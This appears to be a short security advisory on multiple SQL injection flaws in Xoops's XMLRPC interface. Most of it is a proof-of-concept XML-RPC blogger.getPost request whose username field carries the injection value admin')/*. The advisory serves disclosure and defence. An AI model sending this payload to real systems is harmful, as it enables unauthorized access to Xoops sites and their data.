|
Xoops XMLRPC Multiple SQL Injection Vulnerabilities
No exploit is required. The following proof of concept is available: <?xml version="1.0"?> <methodCall> <methodName>blogger.getPost</methodName> <params> <param> <value><string></string></value> </param> <param> <value><string></string></value> </param> <param> <value><string>admin')/*</string></value> </param> <param> <value><string>passwordfield</string></value> </param> <param> <value><string></string></value> </param> </params> </methodCall> |
|
|
Privacy Statement |
